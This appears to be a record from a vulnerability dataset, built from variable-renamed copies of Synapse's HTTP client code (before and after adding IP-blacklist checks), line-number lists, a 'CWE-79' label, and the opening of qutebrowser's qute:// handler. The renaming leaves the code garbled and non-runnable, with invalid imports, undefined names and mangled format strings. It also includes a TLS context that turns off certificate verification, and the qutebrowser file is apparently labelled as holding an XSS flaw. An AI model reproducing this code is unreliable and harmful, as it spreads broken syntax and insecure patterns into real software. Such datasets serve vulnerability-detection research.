VAR_2.labels(VAR_22, "ERR").inc()
VAR_0.info(
"Error sending FUNC_7 to %s %s: %s %s",
VAR_22,
redact_uri(VAR_23),
type(VAR_58).__name__,
VAR_58.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", VAR_58.args[0])
raise
async def FUNC_8(
self,
VAR_23: str,
VAR_16: Optional[Mapping[str, Union[str, List[str]]]] = None,
VAR_24: Optional[VAR_3] = None,
) -> Any:
VAR_0.debug("post_urlencoded_get_json VAR_16: %s", VAR_16)
VAR_45 = FUNC_4(VAR_16)
VAR_46 = {
b"Content-Type": [b"application/VAR_17-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"POST", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_45
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_9(
self, VAR_23: str, VAR_31: Any, VAR_24: Optional[VAR_3] = None
) -> Any:
VAR_48 = encode_canonical_json(VAR_31)
VAR_0.debug("HTTP POST %s -> %s", VAR_48, VAR_23)
VAR_46 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"POST", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_48
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_10(
self,
VAR_23: str,
VAR_16: Optional[VAR_6] = None,
VAR_24: Optional[VAR_3] = None,
) -> Any:
VAR_46 = {b"Accept": [b"application/json"]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_47 = await self.get_raw(VAR_23, VAR_16, VAR_24=headers)
return json_decoder.decode(VAR_47.decode("utf-8"))
async def FUNC_11(
self,
VAR_23: str,
VAR_32: Any,
VAR_16: Optional[VAR_6] = None,
VAR_24: VAR_3 = None,
) -> Any:
if VAR_16:
VAR_39 = urllib.parse.urlencode(VAR_16, True)
VAR_23 = "%s?%s" % (VAR_23, VAR_39)
VAR_48 = encode_canonical_json(VAR_32)
VAR_46 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request(
"PUT", VAR_23, VAR_24=Headers(VAR_46), VAR_30=VAR_48
)
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_47.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_12(
self,
VAR_23: str,
VAR_16: Optional[VAR_6] = None,
VAR_24: Optional[VAR_3] = None,
) -> bytes:
if VAR_16:
VAR_39 = urllib.parse.urlencode(VAR_16, True)
VAR_23 = "%s?%s" % (VAR_23, VAR_39)
VAR_46 = {b"User-Agent": [self.user_agent]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request("GET", VAR_23, VAR_24=Headers(VAR_46))
VAR_47 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return VAR_47
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_47
)
async def FUNC_13(
self,
VAR_33: str,
VAR_34: BinaryIO,
VAR_15: Optional[int] = None,
VAR_24: Optional[VAR_3] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
VAR_46 = {b"User-Agent": [self.user_agent]}
if VAR_24:
VAR_46.update(VAR_24) # type: ignore
VAR_13 = await self.request("GET", VAR_33, VAR_24=Headers(VAR_46))
VAR_49 = dict(VAR_13.headers.getAllRawHeaders())
if (
b"Content-Length" in VAR_49
and VAR_15
and int(VAR_49[b"Content-Length"][0]) > VAR_15
):
VAR_0.warning("Requested URL is too large > %VAR_41 bytes" % (VAR_15,))
raise SynapseError(
502,
"Requested file is too large > %VAR_41 bytes" % (VAR_15,),
Codes.TOO_LARGE,
)
if VAR_13.code > 299:
VAR_0.warning("Got %VAR_37 when downloading %s" % (VAR_13.code, VAR_33))
raise SynapseError(502, "Got error %d" % (VAR_13.code,), Codes.UNKNOWN)
try:
VAR_56 = await make_deferred_yieldable(
FUNC_3(VAR_13, VAR_34, VAR_15)
)
except SynapseError:
raise
except Exception as VAR_58:
raise SynapseError(502, ("Failed to download remote VAR_47: %s" % VAR_58)) from VAR_58
return (
VAR_56,
VAR_49,
VAR_13.request.absoluteURI.decode("ascii"),
VAR_13.code,
)
def FUNC_2(VAR_12: Failure):
if VAR_12.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
raise RequestTimedOutError("Timeout connecting to remote server")
elif VAR_12.check(defer.TimeoutError, ResponseNeverReceived):
raise RequestTimedOutError("Timeout waiting for VAR_13 from remote server")
return VAR_12
class CLASS_3(protocol.Protocol):
def __init__(
self, VAR_14: BinaryIO, VAR_35: defer.Deferred, VAR_15: Optional[int]
):
self.stream = VAR_14
self.deferred = VAR_35
self.length = 0
self.max_size = VAR_15
def FUNC_14(self, VAR_30: bytes) -> None:
self.stream.write(VAR_30)
self.length += len(VAR_30)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %VAR_41 bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def FUNC_15(self, VAR_36: Failure) -> None:
if VAR_36.check(ResponseDone):
self.deferred.callback(self.length)
elif VAR_36.check(PotentialDataLoss):
self.deferred.callback(self.length)
else:
self.deferred.errback(VAR_36)
def FUNC_3(
VAR_13: IResponse, VAR_14: BinaryIO, VAR_15: Optional[int]
) -> defer.Deferred:
VAR_37 = defer.Deferred()
VAR_13.deliverBody(CLASS_3(VAR_14, VAR_37, VAR_15))
return VAR_37
def FUNC_4(VAR_16: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
if VAR_16 is None:
return b""
VAR_38 = {}
for VAR_50, VAR_57 in VAR_16.items():
if isinstance(VAR_57, str):
VAR_57 = [vs]
VAR_38[VAR_50] = [v.encode("utf8") for v in VAR_57]
VAR_39 = urllib.parse.urlencode(VAR_38, True)
return VAR_39.encode("utf8")
class CLASS_4(ssl.ContextFactory):
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def FUNC_16(self, VAR_19=None, VAR_40=None):
return self._context
def FUNC_17(self, VAR_19, VAR_40):
return self
|
import logging
import .urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import .encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import .defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
VAR_0 = logging.getLogger(__name__)
VAR_1 = Counter("synapse_http_client_requests", "", ["method"])
VAR_2 = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
VAR_3 = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
VAR_4 = Sequence[Union[str, bytes]]
VAR_5 = Union[str, bytes, Iterable[Union[str, bytes]]]
VAR_6 = Union[Mapping[str, VAR_5], Mapping[bytes, VAR_5]]
def FUNC_0(
VAR_7: IPAddress, VAR_8: Optional[IPSet], VAR_9: IPSet
) -> bool:
if VAR_7 in VAR_9:
if VAR_8 is None or VAR_7 not in VAR_8:
return True
return False
VAR_10 = 0.00000001
def FUNC_1(VAR_11):
def FUNC_5(VAR_17):
return VAR_11.callLater(VAR_10, VAR_17)
return FUNC_5
class CLASS_0:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_6(
self, VAR_18: IResolutionReceiver, VAR_19: str, VAR_20: int = 0
) -> IResolutionReceiver:
VAR_42 = VAR_18()
VAR_43 = [] # type: List[IAddress]
def FUNC_18() -> None:
VAR_42.resolutionBegan(None)
VAR_52 = False
for i in VAR_43:
VAR_7 = IPAddress(i.host)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (VAR_7, VAR_19)
)
VAR_52 = True
if not VAR_52:
for i in VAR_43:
VAR_42.addressResolved(i)
VAR_42.resolutionComplete()
@provider(IResolutionReceiver)
class CLASS_6:
@staticmethod
def FUNC_19(VAR_53: IHostResolution) -> None:
pass
@staticmethod
def FUNC_20(VAR_54: IAddress) -> None:
VAR_43.append(VAR_54)
@staticmethod
def FUNC_21() -> None:
FUNC_18()
self._reactor.nameResolver.resolveHostName(
CLASS_6, VAR_19, VAR_20=portNumber
)
return VAR_42
@implementer(IReactorPluggableNameResolver)
class CLASS_1:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._nameResolver = CLASS_0(
self._reactor, VAR_8, VAR_9
)
def __getattr__(self, VAR_21: str) -> Any:
if VAR_21 == "nameResolver":
return self._nameResolver
else:
return getattr(self._reactor, VAR_21)
class CLASS_2(Agent):
def __init__(
self,
VAR_22: IAgent,
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
):
self._agent = VAR_22
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_7(
self,
VAR_23: bytes,
VAR_24: bytes,
VAR_25: Optional[Headers] = None,
VAR_26: Optional[IBodyProducer] = None,
) -> defer.Deferred:
VAR_44 = urllib.parse.urlparse(VAR_24.decode("ascii"))
try:
VAR_7 = IPAddress(VAR_44.hostname)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info("Blocking access to %s due to blacklist" % (VAR_7,))
VAR_57 = SynapseError(403, "IP VAR_54 blocked by IP blacklist entry")
return defer.fail(Failure(VAR_57))
except Exception:
pass
return self._agent.request(
VAR_23, VAR_24, VAR_25=headers, VAR_26=bodyProducer
)
class CLASS_3:
def __init__(
self,
VAR_27: "HomeServer",
VAR_28: Dict[str, Any] = {},
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
VAR_29: Optional[bytes] = None,
VAR_30: Optional[bytes] = None,
):
self.hs = VAR_27
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
self._extra_treq_args = VAR_28
self.user_agent = VAR_27.version_string
self.clock = VAR_27.get_clock()
if VAR_27.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, VAR_27.config.user_agent_suffix)
self._cooperator = Cooperator(scheduler=FUNC_1(VAR_27.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
self.reactor = CLASS_1(
VAR_27.get_reactor(), self._ip_whitelist, self._ip_blacklist
)
else:
self.reactor = VAR_27.get_reactor()
VAR_45 = HTTPConnectionPool(self.reactor)
VAR_45.maxPersistentPerHost = max((100 * VAR_27.config.caches.global_factor, 5))
VAR_45.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
VAR_45=pool,
VAR_29=http_proxy,
VAR_30=https_proxy,
)
if self._ip_blacklist:
self.agent = CLASS_2(
self.agent,
VAR_8=self._ip_whitelist,
VAR_9=self._ip_blacklist,
)
async def FUNC_7(
self,
VAR_23: str,
VAR_24: str,
VAR_31: Optional[bytes] = None,
VAR_25: Optional[Headers] = None,
) -> IResponse:
VAR_1.labels(VAR_23).inc()
VAR_0.debug("Sending FUNC_7 %s %s", VAR_23, redact_uri(VAR_24))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: VAR_23,
tags.HTTP_URL: VAR_24,
},
finish_on_close=True,
):
try:
VAR_58 = None
if VAR_31 is not None:
VAR_58 = QuieterFileBodyProducer(
BytesIO(VAR_31), cooperator=self._cooperator,
)
VAR_59 = treq.request(
VAR_23,
VAR_24,
VAR_22=self.agent,
VAR_31=VAR_58,
VAR_25=headers,
**self._extra_treq_args,
) # type: defer.Deferred
VAR_59 = timeout_deferred(
VAR_59, 60, self.hs.get_reactor(),
)
VAR_59.addErrback(FUNC_2)
VAR_13 = await make_deferred_yieldable(VAR_59)
VAR_2.labels(VAR_23, VAR_13.code).inc()
VAR_0.info(
"Received VAR_13 to %s %s: %s",
VAR_23,
redact_uri(VAR_24),
VAR_13.code,
)
return VAR_13
except Exception as VAR_57:
VAR_2.labels(VAR_23, "ERR").inc()
VAR_0.info(
"Error sending FUNC_7 to %s %s: %s %s",
VAR_23,
redact_uri(VAR_24),
type(VAR_57).__name__,
VAR_57.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", VAR_57.args[0])
raise
async def FUNC_8(
self,
VAR_24: str,
VAR_16: Optional[Mapping[str, Union[str, List[str]]]] = None,
VAR_25: Optional[VAR_3] = None,
) -> Any:
VAR_0.debug("post_urlencoded_get_json VAR_16: %s", VAR_16)
VAR_46 = FUNC_4(VAR_16)
VAR_47 = {
b"Content-Type": [b"application/VAR_17-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"POST", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_46
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_9(
self, VAR_24: str, VAR_32: Any, VAR_25: Optional[VAR_3] = None
) -> Any:
VAR_49 = encode_canonical_json(VAR_32)
VAR_0.debug("HTTP POST %s -> %s", VAR_49, VAR_24)
VAR_47 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"POST", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_49
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_10(
self,
VAR_24: str,
VAR_16: Optional[VAR_6] = None,
VAR_25: Optional[VAR_3] = None,
) -> Any:
VAR_47 = {b"Accept": [b"application/json"]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_48 = await self.get_raw(VAR_24, VAR_16, VAR_25=headers)
return json_decoder.decode(VAR_48.decode("utf-8"))
async def FUNC_11(
self,
VAR_24: str,
VAR_33: Any,
VAR_16: Optional[VAR_6] = None,
VAR_25: VAR_3 = None,
) -> Any:
if VAR_16:
VAR_40 = urllib.parse.urlencode(VAR_16, True)
VAR_24 = "%s?%s" % (VAR_24, VAR_40)
VAR_49 = encode_canonical_json(VAR_33)
VAR_47 = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request(
"PUT", VAR_24, VAR_25=Headers(VAR_47), VAR_31=VAR_49
)
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return json_decoder.decode(VAR_48.decode("utf-8"))
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_12(
self,
VAR_24: str,
VAR_16: Optional[VAR_6] = None,
VAR_25: Optional[VAR_3] = None,
) -> bytes:
if VAR_16:
VAR_40 = urllib.parse.urlencode(VAR_16, True)
VAR_24 = "%s?%s" % (VAR_24, VAR_40)
VAR_47 = {b"User-Agent": [self.user_agent]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request("GET", VAR_24, VAR_25=Headers(VAR_47))
VAR_48 = await make_deferred_yieldable(readBody(VAR_13))
if 200 <= VAR_13.code < 300:
return VAR_48
else:
raise HttpResponseException(
VAR_13.code, VAR_13.phrase.decode("ascii", errors="replace"), VAR_48
)
async def FUNC_13(
self,
VAR_34: str,
VAR_35: BinaryIO,
VAR_15: Optional[int] = None,
VAR_25: Optional[VAR_3] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
VAR_47 = {b"User-Agent": [self.user_agent]}
if VAR_25:
VAR_47.update(VAR_25) # type: ignore
VAR_13 = await self.request("GET", VAR_34, VAR_25=Headers(VAR_47))
VAR_50 = dict(VAR_13.headers.getAllRawHeaders())
if (
b"Content-Length" in VAR_50
and VAR_15
and int(VAR_50[b"Content-Length"][0]) > VAR_15
):
VAR_0.warning("Requested URL is too large > %VAR_42 bytes" % (VAR_15,))
raise SynapseError(
502,
"Requested file is too large > %VAR_42 bytes" % (VAR_15,),
Codes.TOO_LARGE,
)
if VAR_13.code > 299:
VAR_0.warning("Got %VAR_38 when downloading %s" % (VAR_13.code, VAR_34))
raise SynapseError(502, "Got error %d" % (VAR_13.code,), Codes.UNKNOWN)
try:
VAR_55 = await make_deferred_yieldable(
FUNC_3(VAR_13, VAR_35, VAR_15)
)
except SynapseError:
raise
except Exception as VAR_57:
raise SynapseError(502, ("Failed to download remote VAR_48: %s" % VAR_57)) from VAR_57
return (
VAR_55,
VAR_50,
VAR_13.request.absoluteURI.decode("ascii"),
VAR_13.code,
)
def FUNC_2(VAR_12: Failure):
if VAR_12.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
raise RequestTimedOutError("Timeout connecting to remote server")
elif VAR_12.check(defer.TimeoutError, ResponseNeverReceived):
raise RequestTimedOutError("Timeout waiting for VAR_13 from remote server")
return VAR_12
class CLASS_4(protocol.Protocol):
def __init__(
self, VAR_14: BinaryIO, VAR_36: defer.Deferred, VAR_15: Optional[int]
):
self.stream = VAR_14
self.deferred = VAR_36
self.length = 0
self.max_size = VAR_15
def FUNC_14(self, VAR_31: bytes) -> None:
self.stream.write(VAR_31)
self.length += len(VAR_31)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %VAR_42 bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def FUNC_15(self, VAR_37: Failure) -> None:
if VAR_37.check(ResponseDone):
self.deferred.callback(self.length)
elif VAR_37.check(PotentialDataLoss):
self.deferred.callback(self.length)
else:
self.deferred.errback(VAR_37)
def FUNC_3(
VAR_13: IResponse, VAR_14: BinaryIO, VAR_15: Optional[int]
) -> defer.Deferred:
VAR_38 = defer.Deferred()
VAR_13.deliverBody(CLASS_4(VAR_14, VAR_38, VAR_15))
return VAR_38
def FUNC_4(VAR_16: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
if VAR_16 is None:
return b""
VAR_39 = {}
for VAR_51, VAR_56 in VAR_16.items():
if isinstance(VAR_56, str):
VAR_56 = [vs]
VAR_39[VAR_51] = [v.encode("utf8") for v in VAR_56]
VAR_40 = urllib.parse.urlencode(VAR_39, True)
return VAR_40.encode("utf8")
class CLASS_5(ssl.ContextFactory):
def __init__(self):
self._context = SSL.Context(SSL.SSLv23_METHOD)
self._context.set_verify(VERIFY_NONE, lambda *_: None)
def FUNC_16(self, VAR_19=None, VAR_41=None):
return self._context
def FUNC_17(self, VAR_19, VAR_41):
return self
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
32,
38,
60,
68,
71,
73,
78,
79,
80,
81,
83,
84,
85,
87,
88,
91,
92,
98,
103,
111,
112,
114,
115,
118,
121,
124,
126,
127,
133,
149,
153,
156,
159,
163,
172,
173,
174,
175,
180,
186,
190,
194,
198,
200,
201,
207,
223,
232,
235,
243,
245,
249,
250,
256,
278,
282,
287,
288,
289,
291,
293,
296,
297,
301,
309,
313,
314,
315,
316,
318,
319,
320,
323,
332,
334,
335,
336,
342,
356,
359,
362,
365,
366,
368,
384,
393,
394,
395,
399,
400,
402,
404,
425,
437,
440,
445,
447,
450,
451,
453,
455,
463,
467,
469,
476,
481,
486,
489,
494,
496,
500,
502,
510,
514,
516,
523,
531,
542,
544,
550,
553,
562,
574,
576,
582,
584,
592,
596,
598,
605,
613,
625,
631,
635,
637,
639,
646,
647,
648,
649,
665,
670,
674,
678,
680,
682,
694,
698,
699,
700,
701,
702,
708,
712,
719,
720,
723,
724,
727,
729,
731,
732,
741,
755,
760,
761,
765,
766,
772,
777,
781,
785,
786,
790,
793,
799,
805,
807,
809,
810,
814,
817,
821,
824,
827,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
117,
118,
119,
120,
129,
130,
131,
132,
203,
204,
205,
206,
252,
253,
254,
255,
770,
771,
772,
773,
774,
775,
776,
777,
778,
779,
780,
788,
789,
790,
791,
792,
793,
794,
795,
796,
812,
813,
814,
815,
816,
140,
141,
142,
143,
144,
145,
214,
215,
216,
217,
218,
219,
266,
267,
268,
269,
270,
271,
272,
273,
274,
275,
276,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
561,
562,
563,
564,
565,
566,
567,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
612,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
657,
658,
659,
660,
661,
662,
663,
664,
665,
666,
667,
668,
669,
670,
671,
672,
673
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
32,
38,
60,
68,
71,
73,
78,
79,
80,
81,
83,
84,
85,
87,
88,
91,
92,
98,
103,
111,
112,
114,
115,
118,
121,
124,
126,
127,
133,
149,
153,
156,
159,
163,
172,
173,
174,
175,
180,
186,
190,
194,
198,
200,
201,
208,
216,
217,
218,
222,
224,
229,
230,
236,
252,
261,
264,
272,
274,
278,
279,
285,
307,
311,
316,
317,
318,
320,
322,
324,
325,
331,
332,
333,
334,
336,
337,
338,
341,
350,
352,
353,
354,
360,
374,
377,
380,
383,
384,
386,
402,
411,
412,
413,
417,
418,
420,
422,
443,
455,
458,
463,
465,
468,
469,
471,
473,
481,
485,
487,
494,
499,
504,
507,
512,
514,
518,
520,
528,
532,
534,
541,
549,
560,
562,
568,
571,
580,
592,
594,
600,
602,
610,
614,
616,
623,
631,
643,
649,
653,
655,
657,
664,
665,
666,
667,
683,
688,
692,
696,
698,
700,
712,
716,
717,
718,
719,
720,
726,
730,
737,
738,
741,
742,
745,
747,
749,
750,
759,
773,
778,
779,
783,
784,
790,
795,
799,
803,
804,
808,
811,
817,
823,
825,
827,
828,
832,
835,
839,
842,
845,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
117,
118,
119,
120,
129,
130,
131,
132,
204,
205,
206,
207,
232,
233,
234,
235,
281,
282,
283,
284,
788,
789,
790,
791,
792,
793,
794,
795,
796,
797,
798,
806,
807,
808,
809,
810,
811,
812,
813,
814,
830,
831,
832,
833,
834,
140,
141,
142,
143,
144,
145,
243,
244,
245,
246,
247,
248,
295,
296,
297,
298,
299,
300,
301,
302,
303,
304,
305,
368,
369,
370,
371,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
509,
510,
511,
512,
513,
514,
515,
516,
548,
549,
550,
551,
552,
553,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589,
590,
591,
592,
593,
594,
595,
596,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
675,
676,
677,
678,
679,
680,
681,
682,
683,
684,
685,
686,
687,
688,
689,
690,
691
] |
1CWE-79
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Backend-independent qute://* code.
Module attributes:
pyeval_output: The output of the last :pyeval command.
_HANDLERS: The handlers registered via decorators.
"""
import json
import os
import time
import textwrap
import mimetypes
import urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
pyeval_output = ":pyeval was never called"
spawn_output = ":spawn was never called"
_HANDLERS = {}
class NoHandlerFound(Exception):
"""Raised when no handler was found for the given URL."""
pass
class QuteSchemeOSError(Exception):
"""Called when there was an OSError inside a handler."""
pass
class QuteSchemeError(Exception):
"""Exception to signal that a handler should return an ErrorReply.
Attributes correspond to the arguments in
networkreply.ErrorNetworkReply.
Attributes:
errorstring: Error string to print.
error: Numerical error value.
"""
def __init__(self, errorstring, error):
self.errorstring = errorstring
self.error = error
super().__init__(errorstring)
class Redirect(Exception):
"""Exception to signal a redirect should happen.
Attributes:
url: The URL to redirect to, as a QUrl.
"""
def __init__(self, url):
super().__init__(url.toDisplayString())
self.url = url
class add_handler: # noqa: N801,N806 pylint: disable=invalid-name
"""Decorator to register a qute://* URL handler.
Attributes:
_name: The 'foo' part of qute://foo
backend: Limit which backends the handler can run with.
"""
def __init__(self, name, backend=None):
self._name = name
self._backend = backend
self._function = None
def __call__(self, function):
self._function = function
_HANDLERS[self._name] = self.wrapper
return function
def wrapper(self, *args, **kwargs):
"""Call the underlying function."""
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*args, **kwargs)
else:
return self._function(*args, **kwargs)
def wrong_backend_handler(self, url):
"""Show an error page about using the invalid backend."""
html = jinja.render('error.html',
title="Error while opening qute://url",
url=url.toDisplayString(),
error='{} is not available with this '
'backend'.format(url.toDisplayString()))
return 'text/html', html
def data_for_url(url):
"""Get the data to show for the given URL.
Args:
url: The QUrl to show.
Return:
A (mimetype, data) tuple.
"""
norm_url = url.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if norm_url != url:
raise Redirect(norm_url)
path = url.path()
host = url.host()
query = urlutils.query_string(url)
# A url like "qute:foo" is split as "scheme:path", not "scheme:host".
log.misc.debug("url: {}, path: {}, host {}".format(
url.toDisplayString(), path, host))
if not path or not host:
new_url = QUrl()
new_url.setScheme('qute')
# When path is absent, e.g. qute://help (with no trailing slash)
if host:
new_url.setHost(host)
# When host is absent, e.g. qute:help
else:
new_url.setHost(path)
new_url.setPath('/')
if query:
new_url.setQuery(query)
if new_url.host(): # path was a valid host
raise Redirect(new_url)
try:
handler = _HANDLERS[host]
except KeyError:
raise NoHandlerFound(url)
try:
mimetype, data = handler(url)
except OSError as e:
# FIXME:qtwebengine how to handle this?
raise QuteSchemeOSError(e)
except QuteSchemeError:
raise
assert mimetype is not None, url
if mimetype == 'text/html' and isinstance(data, str):
# We let handlers return HTML as text
data = data.encode('utf-8', errors='xmlcharrefreplace')
return mimetype, data
@add_handler('bookmarks')
def qute_bookmarks(_url):
"""Handler for qute://bookmarks. Display all quickmarks / bookmarks."""
